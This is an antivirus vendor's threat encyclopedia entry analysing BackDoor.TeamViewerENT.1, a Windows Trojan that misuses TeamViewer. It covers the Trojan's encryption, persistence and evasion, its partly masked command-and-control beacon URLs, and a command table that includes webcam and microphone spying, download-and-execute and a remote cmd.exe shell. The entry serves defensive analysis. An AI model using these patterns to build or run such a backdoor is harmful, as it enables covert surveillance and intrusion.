Bibliothèque
Ma bibliothèque

+ Ajouter à la bibliothèque

Contacter-nous !
Support 24/24 | Rules regarding submitting

Nous téléphoner

0 825 300 230

Forum

Vos requêtes

  • Toutes : -
  • Non clôturées : -
  • Dernière : le -

Nous téléphoner

0 825 300 230

Profil

BackDoor.TeamViewerENT.1

Added to the Dr.Web virus database: 2016-08-15

Virus description added:

SHA1:

  • 001c13d05841d2a82229a35fe58235743f1564fe (dropper)
  • 0660cadef21d2061e776e4bcaa6aa4fb48a778be (avicap32.dll)

A backdoor Trojan for Microsoft Windows that is distributed under the name Spy-Agent. It uses the TeamViewer remote control utility components to spy on users. The Trojan has three encrypted blocks of executable code, The blocks are decrypted one by one. The first block is encrypted with BASE64 and XOR, and the others—with BASE64 and RC4.

The Trojan’s payload is placed into the avicap32.dll library. Once launched, the Trojan disables error messaging for the TeamViewer process. When the configuration is read, it is encrypted with a local key and saved to the previous location. The Trojan intercepts function calls in TeamViewer address area and appends all files in its folder with the attributes “system”, “hidden”, and “read only”.

The Trojan has a list of TeamViewer file checksums and regularly checks them with the help of the API MapFileAndCheckSumA function. If certain files or components are missing for normal operation of TeamViewer, the Trojan downloads them from its command and control (C&C) server. To ensure its autorun, the Trojan modifies particular branches of the Windows system registry, selecting branches from HKCU or HKLM. It depends on whether the Trojan has administrative privileges or not.

The Trojan also removes the tvicap32.dll file. Then it launches a separate thread that kills TeamViewer processes if it detects that TASKMGR.EXE or PROCEXP.EXE are running.

The backdoor uses additional plug-ins, which have .pg extension and are stored in the same folder as the Trojan. To launch them, the backdoor bypasses its folder when searching for .pg files. If it detects files with this extension, it launches several threads (depending on the number of detected files), which decrypt these files using RC4 and load them to the memory.

To send a message about the status, the Trojan determines the cursor location and, after some time specified in the configuration, it sends the following request to the command and control server:

http://188.***.***.27/windiws/update/gate.php?id=<TV_ID>&stat=<botId>&sidl=<cur_time>

Where the address is taken from the configuration, <TV_ID> - ID TeamViewer, <botId> is a unique ID of the infected computer, <cur_time> is a current time in the “YYYY-MM-DD hh:mm:ss” format.

Further requests are sent only if the cursor location is changed or if one of the following keys is pressed: VK_RETURN, VK_SPACE, VK_SHIFT. The Trojan then executes the following request:

http://188.***.***.27/windiws/update/gate.php?id=<TV_ID>&stat=<botId>&eidl=<cur_time>?cidl=<uptime>

Where the address is taken from the configuration, <TV_ID> - ID TeamViewer, <botId> is a unique ID of the infected computer, <cur_time> is a current time in the “YYYY-MM-DD hh:mm:ss” format, —time of the Trojan’s operation in idle mode in seconds (since the last request was sent to the server).

To get instructions from the server, the Trojan waits for a particular number of seconds and then sends the following request to the server:

http://188.***.***.27/windiws/update/gate.php?id=<TV_ID>&stat=<botId>&cidl=<uptime>

Where the address is taken from the configuration, <TV_ID> - ID TeamViewer, <botId> is a unique ID of the infected computer, <uptime> is a time of the Trojan’s operation in idle mode in seconds (since the last request was sent to the server).

The Trojan checks the server’s reply for the presence of the “!” character that means the beginning of the command. Then it breaks the line by line arrays that have ‘;’and ‘\r’ separators. The first line in an array is a command.

Once the commands are executed, the following request is sent to the server:

http://188.***.***.27/windiws/update/gate.php?id=<TV_ID>&stat=<botId>&cmd=&device=2

The Trojan can execute the following commands:

CommandDescription
shutdownRestart the computer
poweroffTurn off the computer
delprocRemove TeamViewer
restartRelaunch TeamViewer
startaudioStart listening through the microphone
stopaudioStop listening through the microphone
startvideoStart viewing via the web camera
stopvideoStop viewing via the web camera
lexecDownload a file, save it to a temporary folder (%TEMP%) and run it
updefUpdate a configuration file and the backdoor’s executable file
vidIdentify the web camera
cmdConnect to the specified address, run cmd.exe and execute input/output redirection to a remote server
delpgRemove plug-in from disk
uppgDownload/update plug-in
upcfgpgReplace configuration file with one specified in the command
oftvdelRename avicap32.dll to tvicap32.dll
noexitSet parameter value to 1
cfgaudio Set value for corresponding configuration parameter
cfgvideo
cfgnomedia
cfghostfile
cfgwin7kill
cfgxpkill
cfgpgkey
fakedel
cfgpassteam
cfg
cfgnoexit
Cfggenid

News about the Trojan

Recommandations pour le traitement

  1. Si le système d'exploitation peut être démarré (en mode normal ou en mode sans échec), téléchargez Dr.Web Security Space et lancez un scan complet de votre ordinateur et de tous les supports amovibles que vous utilisez. En savoir plus sur Dr.Web Security Space.
  2. Si le démarrage du système d'exploitation est impossible, veuillez modifier les paramètres du BIOS de votre ordinateur pour démarrer votre ordinateur via CD/DVD ou clé USB. Téléchargez l'image du disque de secours de restauration du système Dr.Web® LiveDisk ou l'utilitaire pour enregistrer Dr.Web® LiveDisk sur une clé USB, puis préparez la clé USB appropriée. Démarrez l'ordinateur à l'aide de cette clé et lancez le scan complet et le traitement des menaces détectées.

Veuillez lancer le scan complet du système à l'aide de Dr.Web Antivirus pour Mac OS.

Veuillez lancer le scan complet de toutes les partitions du disque à l'aide de Dr.Web Antivirus pour Linux.

  1. Si votre appareil mobile fonctionne correctement, veuillez télécharger et installer sur votre appareil mobile Dr.Web pour Android. Lancez un scan complet et suivez les recommandations sur la neutralisation des menaces détectées.
  2. Si l'appareil mobile est bloqué par le Trojan de la famille Android.Locker (un message sur la violation grave de la loi ou la demande d'une rançon est affiché sur l'écran de l'appareil mobile), procédez comme suit:
    • démarrez votre Smartphone ou votre tablette en mode sans échec (si vous ne savez pas comment faire, consultez la documentation de l'appareil mobile ou contactez le fabricant) ;
    • puis téléchargez et installez sur votre appareil mobile Dr.Web pour Android et lancez un scan complet puis suivez les recommandations sur la neutralisation des menaces détectées ;
    • Débranchez votre appareil et rebranchez-le.

En savoir plus sur Dr.Web pour Android